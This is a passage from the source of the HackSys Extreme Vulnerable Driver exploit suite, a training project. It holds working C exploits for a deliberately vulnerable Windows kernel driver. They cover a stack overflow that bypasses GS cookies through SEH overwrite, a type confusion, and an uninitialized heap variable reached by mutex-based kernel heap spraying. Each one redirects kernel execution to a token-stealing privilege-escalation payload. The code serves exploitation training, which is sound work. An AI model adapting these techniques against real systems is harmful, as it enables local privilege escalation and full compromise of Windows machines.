119 | DeviceIoControl(hFile,
120 | HACKSYS_EVD_IOCTL_STACK_OVERFLOW,
121 | (LPVOID)UserModeBuffer,
122 | (DWORD)UserModeBufferSize,
123 | NULL,
124 | 0,
125 | &BytesReturned,
126 | NULL);
127 |
128 | OutputDebugString("****************Kernel Mode****************\n");
129 |
130 | HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);
131 |
132 | UserModeBuffer = NULL;
133 | }
134 | __except (EXCEPTION_EXECUTE_HANDLER) {
135 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
136 | exit(EXIT_FAILURE);
137 | }
138 |
139 | return EXIT_SUCCESS;
140 | }
141 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflow.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Stack Overflow Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __STACK_OVERFLOW_H__
52 | #define __STACK_OVERFLOW_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | #define RET_OVERWRITE 9
59 |
60 | DWORD WINAPI StackOverflowThread(LPVOID Parameter);
61 |
62 | #endif //__STACK_OVERFLOW_H__
63 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflowGS.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflowGS.c
43 |
44 | Abstract:
45 | This module implements the exploit for Stack Overflow
46 | Vulnerability protected by GS cookies implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "StackOverflowGS.h"
52 |
53 | DWORD WINAPI StackOverflowGSThread(LPVOID Parameter) {
54 | HANDLE hFile = NULL;
55 | ULONG BytesReturned;
56 | SIZE_T PageSize = 0x1000;
57 | HANDLE Sharedmemory = NULL;
58 | PVOID MemoryAddress = NULL;
59 | PVOID SuitableMemoryForBuffer = NULL;
60 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
61 | LPVOID SharedMappedMemoryAddress = NULL;
62 | SIZE_T SeHandlerOverwriteOffset = 0x214;
63 | PVOID EopPayload = &TokenStealingPayladGSWin7;
64 | LPCTSTR SharedMemoryName = (LPCSTR)SHARED_MEMORY_NAME;
65 |
66 | __try {
67 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
68 |
69 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
70 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
71 | }
72 | else {
73 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
74 | }
75 |
76 | // Get the device handle
77 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
78 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
79 |
80 | hFile = GetDeviceHandle(FileName);
81 |
82 | if (hFile == INVALID_HANDLE_VALUE) {
83 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
84 | exit(EXIT_FAILURE);
85 | }
86 | else {
87 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
88 | }
89 |
90 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
91 |
92 | DEBUG_INFO("\t\t[+] Creating Shared Memory\n");
93 |
94 | // Create the shared memory
95 | Sharedmemory = CreateFileMapping(INVALID_HANDLE_VALUE,
96 | NULL,
97 | PAGE_EXECUTE_READWRITE,
98 | 0,
99 | PageSize,
100 | SharedMemoryName);
101 |
102 | if (!Sharedmemory) {
103 | DEBUG_ERROR("\t\t\t[-] Failed To Create Shared Memory: 0x%X\n", GetLastError());
104 | exit(EXIT_FAILURE);
105 | }
106 | else {
107 | DEBUG_INFO("\t\t\t[+] Shared Memory Handle: 0x%p\n", Sharedmemory);
108 | }
109 |
110 | DEBUG_INFO("\t\t[+] Mapping Shared Memory To Current Process Space\n");
111 |
112 | // Map the shared memory in the process space of this process
113 | SharedMappedMemoryAddress = MapViewOfFile(Sharedmemory,
114 | FILE_MAP_ALL_ACCESS,
115 | 0,
116 | 0,
117 | PageSize);
118 |
119 | if (!SharedMappedMemoryAddress) {
120 | DEBUG_ERROR("\t\t\t[-] Failed To Map Shared Memory: 0x%X\n", GetLastError());
121 | exit(EXIT_FAILURE);
122 | }
123 | else {
124 | DEBUG_INFO("\t\t\t[+] Mapped Shared Memory: 0x%p\n", SharedMappedMemoryAddress);
125 | }
126 |
127 | SuitableMemoryForBuffer = (PVOID)((ULONG)SharedMappedMemoryAddress + (ULONG)(PageSize - SeHandlerOverwriteOffset));
128 |
129 | DEBUG_INFO("\t\t[+] Suitable Memory For Buffer: 0x%p\n", SuitableMemoryForBuffer);
130 |
131 | DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");
132 |
133 | RtlFillMemory(SharedMappedMemoryAddress, PageSize, 0x41);
134 |
135 | MemoryAddress = (PVOID)((ULONG)SuitableMemoryForBuffer + 0x204);
136 | *(PULONG)MemoryAddress = 0x42424242; // overwrite xor'ed cookie
137 |
138 | DEBUG_INFO("\t\t\t[+] XOR'ed GS Cookie Value: 0x%p\n", *(PULONG)MemoryAddress);
139 | DEBUG_INFO("\t\t\t[+] XOR'ed GS Cookie Address: 0x%p\n", MemoryAddress);
140 |
141 | MemoryAddress = (PVOID)((ULONG)MemoryAddress + 0x4);
142 | *(PULONG)MemoryAddress = 0x43434343; // junk
143 |
144 | MemoryAddress = (PVOID)((ULONG)MemoryAddress + 0x4);
145 | *(PULONG)MemoryAddress = 0x44444444; // Next SE handler
146 |
147 | DEBUG_INFO("\t\t\t[+] Next SE Handler Value: 0x%p\n", *(PULONG)MemoryAddress);
148 | DEBUG_INFO("\t\t\t[+] Next SE Handler Address: 0x%p\n", MemoryAddress);
149 |
150 | MemoryAddress = (PVOID)((ULONG)MemoryAddress + 0x4);
151 | *(PULONG)MemoryAddress = (ULONG)EopPayload; // SE Handler
152 |
153 | DEBUG_INFO("\t\t\t[+] SE Handler Value: 0x%p\n", *(PULONG)MemoryAddress);
154 | DEBUG_INFO("\t\t\t[+] SE Handler Address: 0x%p\n", MemoryAddress);
155 |
156 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
157 |
158 | DEBUG_MESSAGE("\t[+] Triggering Kernel Stack Overflow GS\n");
159 |
160 | OutputDebugString("****************Kernel Mode****************\n");
161 |
162 | DeviceIoControl(hFile,
163 | HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS,
164 | (LPVOID)SuitableMemoryForBuffer,
165 | (DWORD)SeHandlerOverwriteOffset + RAISE_EXCEPTION_IN_KERNEL_MODE,
166 | NULL,
167 | 0,
168 | &BytesReturned,
169 | NULL);
170 |
171 | OutputDebugString("****************Kernel Mode****************\n");
172 | }
173 | __except (EXCEPTION_EXECUTE_HANDLER) {
174 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
175 | exit(EXIT_FAILURE);
176 | }
177 |
178 | return EXIT_SUCCESS;
179 | }
180 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflowGS.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflowGS.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Stack Overflow Vulnerability protected by
47 | GS cookies implemented in HackSys Extreme Vulnerable
48 | Driver.
49 |
50 | --*/
51 |
52 | #ifndef __STACK_OVERFLOW_GS_H__
53 | #define __STACK_OVERFLOW_GS_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #define RAISE_EXCEPTION_IN_KERNEL_MODE 0x4
60 | #define SHARED_MEMORY_NAME "HackSysExtremeVulnerableDriverSharedMemory"
61 |
62 | DWORD WINAPI StackOverflowGSThread(LPVOID Parameter);
63 |
64 | #endif //__STACK_OVERFLOW_GS_H__
65 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/TypeConfusion.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | TypeConfusion.c
43 |
44 | Abstract:
45 | This module implements the exploit for Type Confusion
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "TypeConfusion.h"
52 |
53 | DWORD WINAPI TypeConfusionThread(LPVOID Parameter) {
54 | HANDLE hFile = NULL;
55 | ULONG BytesReturned;
56 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
57 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
58 | PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject = NULL;
59 |
60 | __try {
61 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
62 |
63 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
64 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
65 | }
66 | else {
67 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
68 | }
69 |
70 | // Get the device handle
71 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
72 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
73 |
74 | hFile = GetDeviceHandle(FileName);
75 |
76 | if (hFile == INVALID_HANDLE_VALUE) {
77 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
78 | exit(EXIT_FAILURE);
79 | }
80 | else {
81 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
82 | }
83 |
84 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
85 |
86 | DEBUG_INFO("\t\t[+] Allocating Memory For USER_TYPE_CONFUSION_OBJECT\n");
87 |
88 | // Allocate the Heap chunk
89 | UserTypeConfusionObject = (PUSER_TYPE_CONFUSION_OBJECT)HeapAlloc(GetProcessHeap(),
90 | HEAP_ZERO_MEMORY,
91 | sizeof(USER_TYPE_CONFUSION_OBJECT));
92 |
93 | if (!UserTypeConfusionObject) {
94 | DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
95 | exit(EXIT_FAILURE);
96 | }
97 | else {
98 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserTypeConfusionObject);
99 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", sizeof(USER_TYPE_CONFUSION_OBJECT));
100 | }
101 |
102 | DEBUG_INFO("\t\t[+] Preparing USER_TYPE_CONFUSION_OBJECT structure\n");
103 |
104 | UserTypeConfusionObject->objectID = (ULONG)0x01;
105 | UserTypeConfusionObject->objectType = (ULONG)EopPayload;
106 |
107 | DEBUG_INFO("\t\t\t[+] UserTypeConfusionObject: 0x%p\n", UserTypeConfusionObject);
108 | DEBUG_INFO("\t\t\t[+] UserTypeConfusionObject->objectID: 0x%p\n", UserTypeConfusionObject->objectID);
109 | DEBUG_INFO("\t\t\t[+] UserTypeConfusionObject->objectType: 0x%p\n", UserTypeConfusionObject->objectType);
110 |
111 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
112 |
113 | DEBUG_MESSAGE("\t[+] Triggering Kernel Type Confusion\n");
114 |
115 | OutputDebugString("****************Kernel Mode****************\n");
116 |
117 | DeviceIoControl(hFile,
118 | HACKSYS_EVD_IOCTL_TYPE_CONFUSION,
119 | (LPVOID)UserTypeConfusionObject,
120 | sizeof(USER_TYPE_CONFUSION_OBJECT),
121 | NULL,
122 | 0,
123 | &BytesReturned,
124 | NULL);
125 |
126 | OutputDebugString("****************Kernel Mode****************\n");
127 |
128 | HeapFree(GetProcessHeap(), 0, (LPVOID)UserTypeConfusionObject);
129 |
130 | UserTypeConfusionObject = NULL;
131 | }
132 | __except (EXCEPTION_EXECUTE_HANDLER) {
133 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
134 | exit(EXIT_FAILURE);
135 | }
136 |
137 | return EXIT_SUCCESS;
138 | }
139 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/TypeConfusion.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | TypeConfusion.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Type Confusion Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __TYPE_CONFUSION_H__
52 | #define __TYPE_CONFUSION_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | typedef struct _USER_TYPE_CONFUSION_OBJECT {
59 | ULONG objectID;
60 | ULONG objectType;
61 | } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
62 |
63 | DWORD WINAPI TypeConfusionThread(LPVOID Parameter);
64 |
65 | #endif //__TYPE_CONFUSION_H__
66 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UninitializedHeapVariable.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedHeapVariable.c
43 |
44 | Abstract:
45 | This module implements the exploit for Uninitialized
46 | Heap Variable Vulnerability implemented in HackSys
47 | Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "UninitializedHeapVariable.h"
52 | #define PAGE_ALLOC 0x400
53 | #define MUTEX_NAME_LEN 120
54 |
55 |
56 | DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter) {
57 | /*CONST PTCHAR Message =
58 | "\t \t\n"
59 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
60 | "\t | C | H | A | L | L | E | N | G | E | \t\n"
61 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
62 | "\t \t\n"
63 | "\t Write the exploit for use of Uninitialized Heap Variable \t\n"
64 | "\t \t\n"
65 | "\t Need Help? \t\n"
66 | "\t \t\n"
67 | "\t ashfaq[at]payatu[dot]com \t\n"
68 | "\t \t\n";
69 |
70 | DEBUG_ERROR(Message);
71 |
72 | return EXIT_FAILURE;*/
73 | int i,j,m;
74 | ULONG BytesReturned;
75 | HMODULE hNtDll = NULL;
76 | PVOID VM_Address = NULL;
77 | ULONG Address = 0;
78 | ULONG CallResult = 0;
79 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
80 | SIZE_T RegionSize = 0x1000;
81 | HANDLE hFile = NULL;
82 |
83 | char aMutexName[MUTEX_NAME_LEN];
84 | HANDLE hMutex[PAGE_ALLOC];
85 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
86 | ULONG MagicValue = 0xBAADF00D;
87 |
88 | __try{
89 | DEBUG_INFO("\t[+] Resolving Kernel APIs\n");//Get Kernel API just like NtAllocVirtualMemory and CreateMutex
90 |
91 | hNtDll = LoadLibrary("ntdll.dll");//Load ntdll.dll
92 |
93 | if(!hNtDll)//if load failure
94 | {
95 | DEBUG_ERROR("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
96 | exit(EXIT_FAILURE);
97 | }
98 |
99 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtDll, "NtAllocateVirtualMemory");//get NtAllocateVirtualMemory
100 |
101 | if (!NtAllocateVirtualMemory) {
102 | DEBUG_ERROR("\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
103 | exit(EXIT_FAILURE);
104 | }
105 | else {
106 | DEBUG_INFO("\t\t[+] NtAllocateVirtualMemory: 0x%p\n", NtAllocateVirtualMemory);
107 | }
108 |
109 | DEBUG_INFO("\t[+] Alloc Memory\n");
110 |
111 | Address = 0x00460046;
112 | VM_Address = (PVOID)Address;
113 | CallResult = NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
114 | &VM_Address,
115 | 0,
116 | &RegionSize,
117 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
118 | PAGE_EXECUTE_READWRITE);
119 |
120 | if (CallResult==0){
121 | DEBUG_INFO("\t\t[+] Allocated memory at VM_Address 0x%p\n", VM_Address);
122 | }
123 | else
124 | {
125 | DEBUG_ERROR("\t\t[-] Create Mutex failed: error 0x%X\n", GetLastError());
126 | exit(EXIT_FAILURE);
127 | }
128 | DEBUG_INFO("\t[+] Kernel Heap Spray\n");
129 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
130 | *(PBYTE)Address = 0x68;
131 | *(PULONG)(Address+1) = (ULONG)EopPayload;
132 | *(PBYTE)(Address+5) = 0xc3;
133 |
134 | for (j=0; j.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
